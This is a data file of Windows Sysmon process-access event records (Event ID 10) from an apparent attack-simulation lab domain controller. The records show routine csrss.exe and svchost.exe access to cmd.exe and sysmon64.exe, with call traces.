{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5417,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.284\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20D6-5F25-0000-00108FD30800}\r\nTargetProcessId: 5068\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.284","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20D6-5F25-0000-00108FD30800}","TargetProcessId":"5068","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5418,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.299\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.299","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5419,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.299\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.299","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5420,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.299\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.299","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5421,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.299\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.299","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5422,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.299\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.299","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5423,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.299\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.299","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5424,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.299\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.299","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5425,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.299\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 